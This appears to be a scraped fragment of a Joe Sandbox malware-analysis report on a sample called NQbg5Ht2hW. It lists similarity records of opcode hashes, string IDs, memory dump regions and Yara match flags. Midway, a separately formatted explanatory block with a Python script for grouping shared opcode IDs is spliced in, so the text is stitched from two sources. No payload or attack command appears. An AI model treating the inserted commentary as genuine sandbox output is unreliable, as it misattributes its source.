• API String ID: 0-3681614764
                                                                                                                                                                                                                                                                        • Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                                                                                                                                                                                        • Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                        • Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                                        • Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                        • Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                                        • Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: jk
                                                                                                                                                                                                                                                                        • API String ID: 0-78326018
                                                                                                                                                                                                                                                                        • Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                                        • Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                        • Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                                        • Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: {}
                                                                                                                                                                                                                                                                        • API String ID: 0-4269290415
                                                                                                                                                                                                                                                                        • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                                        • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                                        • Opcode ID: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                                        • Instruction ID: dfdc5620c09624bbe26e8d5e53306de097bb5731d8b01ca01d6faa4094a966e0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9D106B26083559FEB14CE24C891BAFBBD6AFC5310F09852DE99987382D739DD04C792
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
• Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
• Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
• Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
• Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: /,-
• API String ID: 0-1700940157
• Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
• Instruction ID: 9dd6bfa74182b7f4344a83cea33f4dc40a4646f28fbaf39e6c479d3829482b81
• Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
• Instruction Fuzzy Hash: C0B1AA70B093489FD7648F24C881A3FB7A2EBD6324F18892CE59557281DB39EC05CB97
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID: /,-
• API String ID: 2994545307-1700940157
• Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
• Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
• Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
• Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID: VtA
• API String ID: 2994545307-3724035812
• Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
• Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
• Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
• Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: bC
• API String ID: 0-3681614764
• Opcode ID: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
• Instruction ID: 4d20f92c875f40788edf4275f174b054e137e174bc84352c0492b1430194fbac
• Opcode Fuzzy Hash: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
• Instruction Fuzzy Hash: F3C1C176A28215CFCB08CF68E8905AAB7F2FF8E310F19897DD54597351C734A952CB84
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: 9YB
• API String ID: 0-659603884
• Opcode ID: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
• Instruction ID: 1cfe0ac6ad2819008f92b10fbbf01a1b5c50993105dc128c753fe97305f097ae
• Opcode Fuzzy Hash: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
• Instruction Fuzzy Hash: 80B1077AA00215CBDB18CFA9D8916BFB7B2FF89310F58816DD442AB355DB395C42CB84
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
• Instruction ID: 70845cf30ec6aa4585378c356a0dfa3feb56a06bc3798567d0a6249556526573
• Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
• Instruction Fuzzy Hash: 50912C71E043514BC751CE2DC8802DAB7E5AB81350F688A69D8D5DB3D2EA38DD818BC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
• Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
• Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
• Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5
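The two records above carry the same Opcode ID (2ac21a3d…) but come from different memory dumps: the PE-backed image at 0x400000 and the non-image region at 0x710000 that also has Yara matches. Finding such overlaps by hand across a long report is error-prone, so the following is an added example (not Joe Sandbox code and not part of this report) that parses the flattened Similarity records and lists every Opcode ID seen in more than one dump base. The sample input is three records copied from this page with the layout indentation removed; treating each "Memory Dump Source" line as the start of a record is an assumption about the flattened layout, and only the Offset and "based on PE" values are decoded from the Source File line, since the page does not explain the other dotted fields of the .sdmp name.

```python
"""Group Joe Sandbox 'Similarity' records by Opcode ID across memory dumps.
Added example, not Joe Sandbox code. Record boundary at 'Memory Dump Source'
is an assumption about the flattened report layout."""
import re
from collections import defaultdict

# Constructed sample: three records copied from this report, indentation removed.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
• Instruction ID: 70845cf30ec6aa4585378c356a0dfa3feb56a06bc3798567d0a6249556526573
• Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
• Instruction Fuzzy Hash: 50912C71E043514BC751CE2DC8802DAB7E5AB81350F688A69D8D5DB3D2EA38DD818BC2
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
• Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
• Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
• Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID: VtA
• API String ID: 2994545307-3724035812
• Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
• Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
• Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
• Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")           # "• Key: value" lines
SOURCE_RE = re.compile(r"^(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)")


def parse_records(text):
    """One dict per record; decodes base address and PE flag, keeps other fields verbatim."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":      # assumed record boundary
            cur = {"yara": False}
            records.append(cur)
        elif cur is None:
            continue
        elif line == "Yara matches":          # flag line without a value
            cur["yara"] = True
        elif (m := FIELD_RE.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Source File":
                s = SOURCE_RE.match(value)
                if not s:
                    raise ValueError(f"unexpected Source File line: {value}")
                cur["dump"] = s.group("file")
                cur["base"] = int(s.group("offset"), 16)
                cur["is_image"] = s.group("pe") == "true"
            else:
                cur[key] = value
    return records


def shared_opcodes(records):
    """Opcode IDs found in more than one dump base -> sorted (base, is_image, instr fuzzy hash)."""
    seen = defaultdict(list)
    for r in records:
        if "Opcode ID" in r and "base" in r:
            seen[r["Opcode ID"]].append((r["base"], r["is_image"], r["Instruction Fuzzy Hash"]))
    return {op: sorted(hits) for op, hits in seen.items()
            if len({base for base, _, _ in hits}) > 1}


if __name__ == "__main__":
    for op, hits in shared_opcodes(parse_records(SAMPLE)).items():
        print(f"Opcode ID {op[:16]}... shared by:")
        for base, is_image, ifh in hits:
            print(f"  0x{base:08X} ({'PE image' if is_image else 'non-image region'}) {ifh}")
```

Run against the full report text, the output pairs each shared Opcode ID with the dump bases it occurs in, which is a quick way to see which similarity blocks of the original image reappear in regions the sandbox dumped without a PE header. Note that the two matching records share an Opcode ID and Opcode Fuzzy Hash but have different Instruction IDs and Instruction Fuzzy Hashes, so the comparison key here is deliberately the opcode-level identifier.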
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                        • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                        • Instruction ID: 30ca82cdcce1d0493916ebd13029359326d783108b0e68cd46b56da6f2fbe83f
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC912827759A9047C31CAE7C4C622A6BA834BD7330B2DC77DAAB1CB3E5D67988054394
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                        • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                        • Instruction ID: 9f054d13e7867a4d77ca7132c07c00ca598ea50f9319f8eda39875565fe9693e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD914827759A8007D31C9E3D5C622A7BA834BEB330F2DD37EA5B1CB3E5D56888064359
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                        • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                        • Instruction ID: b5ae1d296ea2915facd6d7ddd437bf4942c9e97856c0c64950f5c7544dc846d2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4FB137702083859FC321CF5CC88065BBBE0AFA9304F544A2DE5D997382D635EA58CBA6
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                        • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                        • Instruction ID: 72525c85f477075dffe7e14f80d8e4d34094ebf61648e765f9981e94dfd3314a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88B137711087859FC321DF18C88061BFBE0AFA9704F444A2EF5D997782D675E918CB67
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: gfff
                                                                                                                                                                                                                                                                        • API String ID: 0-1553575800
                                                                                                                                                                                                                                                                        • Opcode ID: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                                                                                                                                                                                                                                                        • Instruction ID: c6da04c5cd0472ce011a8a242121930f63aeecbf874b06e55c4fa3b077080af6
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8716A72A182518BD328CF28DC55BABBBD6EBC1304F19C53DD481DB395DB789905C781
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                        • Instruction ID: 3995e9f3c9bb9fff91031e99cef6853dcc0ef57366a7185c19b4f302afde3589
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F571F632A083558BF724CE2CC48032EB7E2ABC5710F29C56DE6949B393D739DD458786
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                        • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
• Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
• Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA

Strings
Memory Dump Source
